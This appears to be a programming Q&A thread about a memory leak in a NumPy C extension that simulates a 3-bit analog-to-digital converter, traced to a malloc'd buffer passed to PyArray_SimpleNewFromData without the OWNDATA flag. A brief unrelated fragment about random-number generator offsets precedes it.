For 8-bit values, advance the offset by the N * next highest multiple of 4, for N values generated. For 16, advance by N * the next multiple of 2. For 32 advance by the N, and for 64 advance by 2*N.
HOWEVER, if you use GenerateUniformDouble, you only need to advance by N, not 2*N. I'm not sure why.
Thanks for the help!

Memory leak in Python extension when array is created with PyArray_SimpleNewFromData() and returned

I wrote a simple Python extension module to simulate a 3-bit analog-to-digital converter. It accepts a floating-point array as input and is supposed to return an array of the same size containing the quantized input values. Here is my (simplified) module:
static PyObject *adc3(PyObject *self, PyObject *args) {
    PyArrayObject *inArray = NULL, *outArray = NULL;
    double *pinp = NULL, *pout = NULL;
    npy_intp nelem;
    npy_intp dims[1];  /* npy_intp, not int: PyArray_SimpleNewFromData expects npy_intp dims */
    npy_intp i;
    /* Get arguments: */
    if (!PyArg_ParseTuple(args, "O:adc3", &inArray))
        return NULL;
    nelem = PyArray_DIM(inArray, 0); /* size of the input array */
    pout = (double *) malloc(nelem*sizeof(double));
    pinp = (double *) PyArray_DATA(inArray);
    /* ADC action */
    for (i = 0; i < nelem; i++) {
        if (pinp[i] >= -0.5) {
            if (pinp[i] < 0.5) pout[i] = 0;
            else if (pinp[i] < 1.5) pout[i] = 1;
            else if (pinp[i] < 2.5) pout[i] = 2;
            else if (pinp[i] < 3.5) pout[i] = 3;
            else pout[i] = 4;
        }
        else {
            if (pinp[i] >= -1.5) pout[i] = -1;
            else if (pinp[i] >= -2.5) pout[i] = -2;
            else if (pinp[i] >= -3.5) pout[i] = -3;
            else pout[i] = -4;
        }
    }
    dims[0] = nelem;
    outArray = (PyArrayObject *)
        PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
    //Py_INCREF(outArray);
    return PyArray_Return(outArray);
}

/* ==== methods table ====================== */
static PyMethodDef mwa_methods[] = {
    {"adc3", adc3, METH_VARARGS, "n-bit Analog-to-Digital Converter (ADC)"},  /* name must match adc3 */
    {NULL, NULL, 0, NULL}
};

/* ==== Initialize ====================== */
PyMODINIT_FUNC initmwa() {
    Py_InitModule("mwa", mwa_methods);
    import_array(); // for NumPy
}
I expected that if reference counts were processed correctly, the Python garbage collection would (frequently enough) release the memory used by the output array if it has the same name and is used repeatedly. So I tested it on some dummy (but voluminous) data with this code:
for i in xrange(200):
a = rand(1000000)
b = mwa.adc3(a)
print i
Here the array named "b" is reused many times, and its memory, borrowed by adc3() from the heap, is expected to be returned to the system. I used gnome-system-monitor to check. Contrary to my expectations, the memory owned by Python grew rapidly and could only be released by quitting the program (I use IPython).
For comparison, I tried the same procedure with the standard NumPy functions, zeros() and copy():
for i in xrange(1000):
a = np.zeros(10000000)
b = np.copy(a)
print i
As you can see, the latter code does not cause any memory build-up.
I read many texts in the standard documentation and on the web, and tried using Py_INCREF(outArray) and not using it. All in vain: the problem persisted.
However, I found the solution at http://wiki.scipy.org/Cookbook/C_Extensions/NumPy_arrays.
The author provides an extension program matsq() that creates an array and returns it. When I tried to use the calls suggested by the author:
outArray = (PyArrayObject *) PyArray_FromDims(nd,dims,NPY_DOUBLE);
pout = (double *) outArray->data;
instead of my
pout = (double *) malloc(nelem*sizeof(double));
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
/* no matter with or without Py_INCREF(outArray)) */
the memory leak was gone! The program works properly now.
A question: can anybody explain why PyArray_SimpleNewFromData() does not provide the correct reference counting, while PyArray_FromDims() does?
Thank you very much.
ADDITION. I probably exceeded the room/time allowed in comments, so I am continuing my reply to Alex here.
I tried to set the OWNDATA flag this way:
outArray->flags |= OWNDATA;
but I got "error: ‘OWNDATA’ undeclared".
The rest is in the comment. Thank you in advance.
SOLVED: The correct setting of the flag is
outArray->flags |= NPY_ARRAY_OWNDATA;
Now it works.
Alex, sorry.
The problem is not with PyArray_SimpleNewFromData, which produces a properly refcounted PyObject*. Rather, it's with your malloc, assigned to pout and then never freed.
As the docs at http://docs.scipy.org/doc/numpy/user/c-info.how-to-extend.html clearly state, documenting PyArray_SimpleNewFromData:
the ndarray will not own its data. When this ndarray is
deallocated, the pointer will not be freed.
...
If you want the
memory to be freed as soon as the ndarray is deallocated then simply
set the OWNDATA flag on the returned ndarray.
(my emphasis on the not). IOW, you're observing exactly the "will not be freed" behavior so clearly documented, and are not taking the step specifically recommended should you want to avoid said behavior.
